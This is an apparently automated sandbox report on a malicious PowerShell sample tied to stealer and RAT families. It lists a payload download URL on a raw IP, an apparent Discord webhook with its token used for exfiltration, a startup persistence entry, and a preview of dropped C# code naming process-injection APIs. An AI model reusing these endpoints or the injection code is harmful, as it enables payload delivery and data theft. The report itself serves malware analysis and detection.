                                                    https://github.com/LimerBoy/StormKittypowershell.exe, 00000005.00000002.2255186878.0000029DDDAB6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2255186878.0000029DDC076000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2322702408.0000029DEC168000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000009.00000002.4562176315.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                                                      high
                                                      https://stackoverflow.com/q/11564914/23354;powershell.exe, 00000005.00000002.2322702408.0000029DEBE46000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2322702408.0000029DEC168000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000009.00000002.4562176315.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                                                        high
                                                        https://stackoverflow.com/q/2152978/23354powershell.exe, 00000005.00000002.2322702408.0000029DEBE46000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2322702408.0000029DEC168000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000009.00000002.4562176315.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                                                          high
                                                          https://discord.com/api/webhooks/1016614786533969920/fMJOOjA1pZqjV8_s0JC86KN9Fa0FeGPEHaEak8WTADC18s5powershell.exe, 00000005.00000002.2322702408.0000029DEBE46000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2322702408.0000029DEC168000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000009.00000002.4562176315.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                                                            high
                                                            https://contoso.com/powershell.exe, 00000005.00000002.2322702408.0000029DEBBD9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              high
                                                              https://nuget.org/nuget.exepowershell.exe, 00000000.00000002.2177874216.0000027EBA27F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2177874216.0000027EBA13C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2322702408.0000029DEBBD9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                high
                                                                http://147.45.44.131/infopage/sfxqr.ps1.powershell.exe, 00000005.00000002.2253725513.0000029DD9D42000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                http://147.45.44.131/infopage/sfxqr.ps1USERDOMAIN=user-PCUSERDpowershell.exe, 00000005.00000002.2348971545.0000029DF3D59000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                http://147.45.44.131/infopage/sfxqr.ps1userdomain=user-PCuserdomain_roamingprofile=user-PCuscvtres.exe, 00000008.00000002.2190952003.00000226E6E60000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  unknown
                                                                  https://aka.ms/pscore68powershell.exe, 00000000.00000002.2146890283.0000027EAA0D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2255186878.0000029DDBB51000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    high
                                                                    https://urn.to/r/sds_seepowershell.exe, 00000005.00000002.2322702408.0000029DEBE46000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2322702408.0000029DEC168000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000009.00000002.4562176315.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                      high
                                                                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000000.00000002.2146890283.0000027EAA0D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2255186878.0000029DDBB51000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000009.00000002.4582340011.0000000003031000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        high
                                                                        http://www.microsoft.pkiopowershell.exe, 00000005.00000002.2351616241.0000029DF4177000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        • Avira URL Cloud: safe
                                                                        unknown
                                                                        http://147.45.44powershell.exe, 00000000.00000002.2146890283.0000027EAB702000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2255186878.0000029DDD7B5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        • Avira URL Cloud: safe
                                                                        unknown
                                                                        http://147.45.44.131/infopage/sfxqr.ps1userdocsc.exe, 00000007.00000003.2191411279.000001EEBBF06000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000007.00000002.2193640224.000001EEBBF06000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000007.00000003.2191275065.000001EEBBF06000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        • Avira URL Cloud: safe
                                                                        unknown
                                                                        • No. of IPs < 25%
                                                                        • 25% < No. of IPs < 50%
                                                                        • 50% < No. of IPs < 75%
                                                                        • 75% < No. of IPs
                                                                        IPDomainCountryFlagASNASN NameMalicious
                                                                        147.45.44.131
                                                                        unknownRussian Federation
                                                                        2895FREE-NET-ASFREEnetEUfalse
                                                                        94.130.22.61
                                                                        unknownGermany
                                                                        24940HETZNER-ASDEtrue
                                                                        Joe Sandbox version:41.0.0 Charoite
                                                                        Analysis ID:1585139
                                                                        Start date and time:2025-01-07 06:11:05 +01:00
                                                                        Joe Sandbox product:CloudBasic
                                                                        Overall analysis duration:0h 9m 4s
                                                                        Hypervisor based Inspection enabled:false
                                                                        Report type:full
                                                                        Cookbook file name:default.jbs
                                                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                        Number of analysed new started processes analysed:14
                                                                        Number of new started drivers analysed:0
                                                                        Number of existing processes analysed:0
                                                                        Number of existing drivers analysed:0
                                                                        Number of injected processes analysed:0
                                                                        Technologies:
                                                                        • HCA enabled
                                                                        • EGA enabled
                                                                        • AMSI enabled
                                                                        Analysis Mode:default
                                                                        Analysis stop reason:Timeout
                                                                        Sample name:sfqbr.ps1
                                                                        Detection:MAL
                                                                        Classification:mal100.troj.spyw.expl.evad.winPS1@16/18@1/2
                                                                        EGA Information:
                                                                        • Successful, ratio: 66.7%
                                                                        HCA Information:
                                                                        • Successful, ratio: 91%
                                                                        • Number of executed functions: 63
                                                                        • Number of non-executed functions: 4
                                                                        Cookbook Comments:
                                                                        • Found application associated with file extension: .ps1
                                                                        • Override analysis time to 240000 for current running targets taking high CPU consumption
                                                                        • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                                                        • Excluded IPs from analysis (whitelisted): 2.22.50.131, 2.22.50.144, 13.107.246.45, 20.12.23.50, 13.95.31.18, 20.109.210.53
                                                                        • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, ctldl.windowsupdate.com, a767.dspw65.akamai.net, wu-b-net.trafficmanager.net, fe3cr.delivery.mp.microsoft.com, download.windowsupdate.com.edgesuite.net
                                                                        • Execution Graph export aborted for target powershell.exe, PID 4980 because it is empty
                                                                        • Not all processes where analyzed, report is missing behavior information
                                                                        • Report size exceeded maximum capacity and may have missing behavior information.
                                                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                                                        • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                        • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                        TimeTypeDescription
                                                                        00:11:57API Interceptor51x Sleep call for process: powershell.exe modified
                                                                        00:12:11API Interceptor8124666x Sleep call for process: RegAsm.exe modified
                                                                        06:12:00AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\App.url
                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                        147.45.44.131CKi4EZWZsC.ps1Get hashmaliciousDcRat, KeyLogger, StormKitty, Strela Stealer, VenomRATBrowse
                                                                        • 147.45.44.131/infopage/tvsqyp.exe
                                                                        iviewers.dllGet hashmaliciousDcRat, KeyLogger, StormKitty, Strela Stealer, VenomRATBrowse
                                                                        • 147.45.44.131/infopage/ersyb.exe
                                                                        wrcaf.ps1Get hashmaliciousDcRat, KeyLogger, StormKitty, Strela Stealer, VenomRATBrowse
                                                                        • 147.45.44.131/infopage/ersyb.exe
                                                                        iubn.ps1Get hashmaliciousDcRat, KeyLogger, StormKitty, Strela Stealer, VenomRATBrowse
                                                                        • 147.45.44.131/infopage/ersyb.exe
                                                                        rwvg1.exeGet hashmaliciousDcRat, KeyLogger, StormKitty, VenomRATBrowse
                                                                        • 147.45.44.131/infopage/ersyb.exe
                                                                        2 ps1.ps1Get hashmaliciousKeyLogger, StormKitty, Strela Stealer, VenomRATBrowse
                                                                        • 147.45.44.131/infopage/ersyb.exe
                                                                        vfrcxq.ps1Get hashmaliciousAveMaria, DcRat, KeyLogger, StormKitty, Strela Stealer, VenomRATBrowse
                                                                        • 147.45.44.131/infopage/yijth.exe
                                                                        vfdjo.exeGet hashmaliciousAveMaria, DcRat, KeyLogger, StormKitty, VenomRATBrowse
                                                                        • 147.45.44.131/infopage/yijth.exe
                                                                        gqub.batGet hashmaliciousAveMaria, DcRat, KeyLogger, StormKitty, Strela Stealer, VenomRATBrowse
                                                                        • 147.45.44.131/infopage/yijth.exe
                                                                        trwsfg.ps1Get hashmaliciousAveMaria, DcRat, KeyLogger, StormKitty, Strela Stealer, VenomRATBrowse
                                                                        • 147.45.44.131/infopage/yijth.exe
                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                        bg.microsoft.map.fastly.netVernales Restaurant-encrypted.pdfGet hashmaliciousHTMLPhisherBrowse
                                                                        • 199.232.210.172
                                                                        KHK0987.xlsxGet hashmaliciousUnknownBrowse
                                                                        • 199.232.214.172
                                                                        new.batGet hashmaliciousUnknownBrowse
                                                                        • 199.232.214.172
                                                                        fiyati_teklif 615TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                        • 199.232.210.172
                                                                        #Employee-Letter.pdfGet hashmaliciousUnknownBrowse
                                                                        • 199.232.210.172
                                                                        Agent381.msiGet hashmaliciousUnknownBrowse
                                                                        • 199.232.210.172
                                                                        build.exeGet hashmaliciousRedLineBrowse
                                                                        • 199.232.214.172
                                                                        AZfDGVWF68.pdfGet hashmaliciousUnknownBrowse
                                                                        • 199.232.210.172
                                                                        CKi4EZWZsC.ps1Get hashmaliciousDcRat, KeyLogger, StormKitty, Strela Stealer, VenomRATBrowse
                                                                        • 199.232.214.172
                                                                        LZUCldA1ro.exeGet hashmaliciousUnknownBrowse
                                                                        • 199.232.210.172
                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                        HETZNER-ASDEhttp://yamjoop.siteGet hashmaliciousUnknownBrowse
                                                                        • 116.203.80.157
                                                                        ZipThis.exeGet hashmaliciousUnknownBrowse
                                                                        • 5.161.105.73
                                                                        https://tfeweb.co.uk/signoffGet hashmaliciousUnknownBrowse
                                                                        • 144.76.9.200
                                                                        rHP_SCAN_DOCUME.exeGet hashmaliciousFormBookBrowse
                                                                        • 136.243.225.5
                                                                        https://sendbot.me/mousse-w0fysl7Get hashmaliciousUnknownBrowse
                                                                        • 88.198.57.50
                                                                        http://www.housepricesintheuk.co.ukGet hashmaliciousUnknownBrowse
                                                                        • 178.63.241.79
                                                                        getscreen-524501439-x86.exeGet hashmaliciousUnknownBrowse
                                                                        • 78.47.165.25
                                                                        getscreen-524501439-x86.exeGet hashmaliciousUnknownBrowse
                                                                        • 78.47.165.25
                                                                        getscreen-524501439.exeGet hashmaliciousUnknownBrowse
                                                                        • 5.75.168.191
                                                                        getscreen-524501439.exeGet hashmaliciousUnknownBrowse
                                                                        • 78.47.165.25
                                                                        FREE-NET-ASFREEnetEUhidakibest.sparc.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                        • 185.103.102.219
                                                                        hidakibest.x86.elfGet hashmaliciousMirai, GafgytBrowse
                                                                        • 185.103.102.219
                                                                        hidakibest.arm5.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                        • 185.103.102.219
                                                                        hidakibest.mips.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                        • 185.103.102.219
                                                                        hidakibest.arm6.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                        • 185.103.102.219
                                                                        hidakibest.mpsl.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                        • 185.103.102.219
                                                                        hidakibest.arm4.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                        • 185.103.102.219
                                                                        hidakibest.ppc.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                        • 185.103.102.219
                                                                        hidakibest.arm7.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                        • 185.103.102.219
                                                                        CKi4EZWZsC.ps1Get hashmaliciousDcRat, KeyLogger, StormKitty, Strela Stealer, VenomRATBrowse
                                                                        • 147.45.44.131
                                                                        No context
                                                                        No context
                                                                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                        File Type:Microsoft Cabinet archive data, Windows 2000/XP setup, 71954 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
                                                                        Category:dropped
                                                                        Size (bytes):71954
                                                                        Entropy (8bit):7.996617769952133
                                                                        Encrypted:true
                                                                        SSDEEP:1536:gc257bHnClJ3v5mnAQEBP+bfnW8Ctl8G1G4eu76NWDdB34w18R5cBWcJAm68+Q:gp2ld5jPqW8LgeulxB3fgcEfDQ
                                                                        MD5:49AEBF8CBD62D92AC215B2923FB1B9F5
                                                                        SHA1:1723BE06719828DDA65AD804298D0431F6AFF976
                                                                        SHA-256:B33EFCB95235B98B48508E019AFA4B7655E80CF071DEFABD8B2123FC8B29307F
                                                                        SHA-512:BF86116B015FB56709516D686E168E7C9C68365136231CC51D0B6542AE95323A71D2C7ACEC84AAD7DCECC2E410843F6D82A0A6D51B9ACFC721A9C84FDD877B5B
                                                                        Malicious:false
                                                                        Reputation:high, very likely benign file
                                                                        Preview:MSCF............,...................I..................XaK .authroot.stl.[.i..6..CK..<Tk......4.cl!Kg..E..*Y.f_..".$mR"$.J.E.KB."..rKv.."{.g....3.W.....c..9.s...=....y6#..x..........D......\(.#.s.!.A.......cd.c........+^.ov...n.....3BL..0.......BPUR&.X..02.q...R...J.....w.....b.vy>....-.&..(..oe."."...J9...0U.6J..|U..S.....M.F8g...=.......p...........l.?3.J.x.G.Ep..$g..tj......)v]9(:.)W.8.Op.1Q..:.nPd........7.7..M].V F..g.....12..!7(...B.......h.RZ.......l.<.....6..Z^.`p?... .p.Gp.#.'.X..........|!.8.....".m.49r?.I...g...8.v.....a``.g.R4.i...J8q....NFW,E.6Y....!.o5%.Y.....R..<..S9....r....WO...(.....F..Q=*....-..7d..O(....-..+k.........K..........{Q....Z..j._.E...QZ.~.\.^......N.9.k..O.}dD.b1r...[}/....T..E..G..c.|.c.&>?..^t. ..;..X.d.E.0G....[Q.*,*......#.Dp..L.o|#syc.J............}G-.ou6.=52..XWi=...m.....^u......c..fc?&pR7S5....I...j.G........j.j..Tc.El.....B.pQ.,Bp....j...9g.. >..s..m#.Nb.o_u.M.V...........\#...v..Mo\sF..s....Y...
                                                                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):328
                                                                        Entropy (8bit):3.144086598890895
                                                                        Encrypted:false
                                                                        SSDEEP:6:kK3F+kNF9UswDLL+N+SkQlPlEGYRMY9z+4KlDA3RUebT3:8EsDnLNkPlE99SNxAhUe/3
                                                                        MD5:7D461885E6A0492E369BC7831392ED57
                                                                        SHA1:D5B178D0856B675A31080E2AAC0F59BE107053F4
                                                                        SHA-256:31D453FDC2ED4EBC89B33BF91293AE280C924969D9FDEF6C45974338C4067DC7
                                                                        SHA-512:9733F02603441515826CA1E50F0D2DB9FEE95C5E5A3FE45A77A34C32BC2B06F917CD9F3B97D7B31226395D2F4DE1E33E5476A6A699FB1CC0DB972764475E9236
                                                                        Malicious:false
                                                                        Preview:p...... .........@...`..(....................................................... ........G..@.......&...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".a.7.2.8.2.e.b.4.0.b.1.d.a.1.:.0."...
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):2832
                                                                        Entropy (8bit):5.418003316338724
                                                                        Encrypted:false
                                                                        SSDEEP:48:0AzsSU4Yymdo+ms4RKqr9tEoUQ/78NVuGxJZKaVEouYAgwd64rHLjtvz:0AzlHYv2sIKqrnl7KFJ5Eo9Adrxz
                                                                        MD5:E5D71D8DB7ED8F1EB4C974C8B7E87D0B
                                                                        SHA1:ED45D5A009786F90FF8758B4B8295C35AA7B6EC7
                                                                        SHA-256:DEC0154F313832B7C04064A2CF55837F4D18D6A36051BDE1FF2212A395B6F117
                                                                        SHA-512:1AEB1E3CB610FF5672A68DA3C2EECF7D79D516F2C4658C4D46D1327CE47E4114212B920876043B82CE1EB569934D032EBD48328AD9C678124C32051F16C5330B
                                                                        Malicious:false
                                                                        Preview:@...e...........................................................H..............@-....f.J.|.7h8..-.......Microsoft.Powershell.PSReadline.H...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices<...............i..VdqF...|...........System.Configuration4.................%...K... ...........System.Xml..4.................0..~.J.R...L........System.Data.H................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...L.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................$@...J....M+.B........System.Transactions.8..................1...L..U;V.<}........System.Numerics.8.................C}...C....n..Bi.......Microsoft.CSharpP...............
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):64
                                                                        Entropy (8bit):1.1940658735648508
                                                                        Encrypted:false
                                                                        SSDEEP:3:NlllulVmdtZ:NllUM
                                                                        MD5:013016A37665E1E37F0A3576A8EC8324
                                                                        SHA1:260F55EC88E3C4D384658F3C18C7FDEF202E47DD
                                                                        SHA-256:20C6A3C78E9B98F92B0F0AA8C338FF0BAC1312CBBFE5E65D4C940B828AC92FD8
                                                                        SHA-512:99063E180730047A4408E3EF8ABBE1C53DEC1DF04469DFA98666308F60F8E35DEBF7E32066FE0DD1055E1181167061B3512EEE4FE72D0CD3D174E3378BA62ED8
                                                                        Malicious:false
                                                                        Preview:@...e................................................@..........
                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                        File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x496, 9 symbols, created Tue Jan 7 06:38:23 2025, 1st section name ".debug$S"
                                                                        Category:dropped
                                                                        Size (bytes):1340
                                                                        Entropy (8bit):3.9912137203615257
                                                                        Encrypted:false
                                                                        SSDEEP:24:HRK9oVaDxftbaHkwKKjmNII+ycuZhNZakS3PNnqSed:9IaLKMmu1ulZa3lqS+
                                                                        MD5:D396B75DCD4C9779D9E3FDD2A6327880
                                                                        SHA1:C72462245B4B9B7352CFDAE24E2E05FAC19E865F
                                                                        SHA-256:C9D8C5836A90D873AC5CF3C6714FE1A0AB8588920A94C533FF8E48061DFDF6F1
                                                                        SHA-512:8EEC0236F57CF4C1F3B5F1A29CC3AEAB80D101983553DE0817CD33B908794CDE07D33184A26182E8616AAAFE778FB76C687581DDFC1785EBAD64C881BED259B4
                                                                        Malicious:false
                                                                        Preview:L.....|g.............debug$S........X...................@..B.rsrc$01........X.......<...........@..@.rsrc$02........P...F...............@..@........W....c:\Users\user\AppData\Local\Temp\nfy3200k\CSCAAE263D2780F40D49B69A6171B4A2D61.TMP.................c,....y....Y.............7.......C:\Users\user\AppData\Local\Temp\RES617A.tmp.-.<....................a..Microsoft (R) CVTRES.a.=..cwd.C:\Users\user\Desktop.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe...............................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...n.f.y.3.2.0.0.k...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.038920595031593
                                                                        Encrypted:false
                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                        Malicious:false
                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.038920595031593
                                                                        Encrypted:false
                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                        Malicious:false
                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.038920595031593
                                                                        Encrypted:false
                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                        Malicious:false
                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.038920595031593
                                                                        Encrypted:false
                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                        Malicious:false
                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                        File Type:MSVC .res
                                                                        Category:dropped
                                                                        Size (bytes):652
                                                                        Entropy (8bit):3.0959731367919052
                                                                        Encrypted:false
                                                                        SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryFEGak7YnqqUEXPN5Dlq5J:+RI+ycuZhNZakS3PNnqX
                                                                        MD5:DB632CA58DE80F790CC7EF1959D700EF
                                                                        SHA1:0F6AF8F8D8358D906AAB2BA82D87BA6CE2BB2266
                                                                        SHA-256:3BD34C3EBA16ADDB0503A19838344966DA31990CCEEC294AD0CCFCAFB05E3336
                                                                        SHA-512:5F2065BBE5C5DD7FEAFFB97C21C34D3D42313AA92DAA6C884BCDB5290CC7B51B228364D8281D5CEFCA1B7C6BA9626D9739C579D09E473C69308E9F7068C324D4
                                                                        Malicious:false
                                                                        Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...n.f.y.3.2.0.0.k...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...n.f.y.3.2.0.0.k...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                        Category:dropped
                                                                        Size (bytes):11063
                                                                        Entropy (8bit):4.5458267039399365
                                                                        Encrypted:false
                                                                        SSDEEP:192:2QC2o4mAQgOLocU9wMk2kAt/Z7pu/cuvnzHzrEo6kT:2oYLoH97t/Z7pgjvzf5tT
                                                                        MD5:4CFFC8D6FE3870E0046B7BE9BFF146AA
                                                                        SHA1:AEE44D9772C5392C5DA7237BA0090CBADFD4EEAC
                                                                        SHA-256:E6518D89D7C8F761A277FE634FED0C41A4DEEE7C8D5CD4EACA503D88F247EC83
                                                                        SHA-512:42FA00F7CE8FB9F77F1C7B3B140BB6708D01609BBC77514E86D34C1ED82B2D6A0A4F4775674043C3E4A486E4E19F3DCF3C0D33F73FCD79E75126B2F42FAC136A
                                                                        Malicious:true
                                                                        Preview:.using System;..using System.Diagnostics;..using System.IO;..using System.Net;..using System.Runtime.InteropServices;..using System.Threading.Tasks;....public class ClasserPlus..{.. public static Int16 ConvertToInt16(byte[] value, int startIndex).. {.. return BitConverter.ToInt16(value, startIndex);.. }.... public static Int32 ConvertToInt32(byte[] value, int startIndex).. {.. return BitConverter.ToInt32(value, startIndex);.. }.... public static byte[] ConvertToBytes(int value).. {.. return BitConverter.GetBytes(value);.. }.... public static string[] GetApiNames().. {.. return new string[].. {.. "kernel32",.. "ntdll",.. "ResumeThread",.. "Wow64SetThreadContext",.. "SetThreadContext",.. "Wow64GetThreadContext",.. "GetThreadContext",.. "VirtualAllocEx",.. "WriteProcessMemory",.. "ReadProcessMemory",..
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):210
                                                                        Entropy (8bit):5.087225372394673
                                                                        Encrypted:false
                                                                        SSDEEP:6:pAu+H2L/6K2N723fb50zxszIN723fb5BHn:p37L/6K2aD50taDDn
                                                                        MD5:D2C4055DE230D86BA6018FC0D5D6F766
                                                                        SHA1:6CF8469E845D7D81438066C36A3A87A3369278E5
                                                                        SHA-256:BB90201656B66D7FDBB89EFC94F097E80484F8B3E81CA0D3EADF6FFAE13C05D5
                                                                        SHA-512:877FA1C5476370137900D7CF7123EA5E81D77A6CF0F0DAF23A11542E14B761E7CF5925B2CDB5BA01260D6A295E1FBD5A06C81767C7F7C1EEDD41DFA9CACCFA07
                                                                        Malicious:true
                                                                        Preview:./t:library /utf8output /R:"System.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\nfy3200k\nfy3200k.dll" /debug- /optimize+ "C:\Users\user\AppData\Local\Temp\nfy3200k\nfy3200k.0.cs"
                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                        Category:dropped
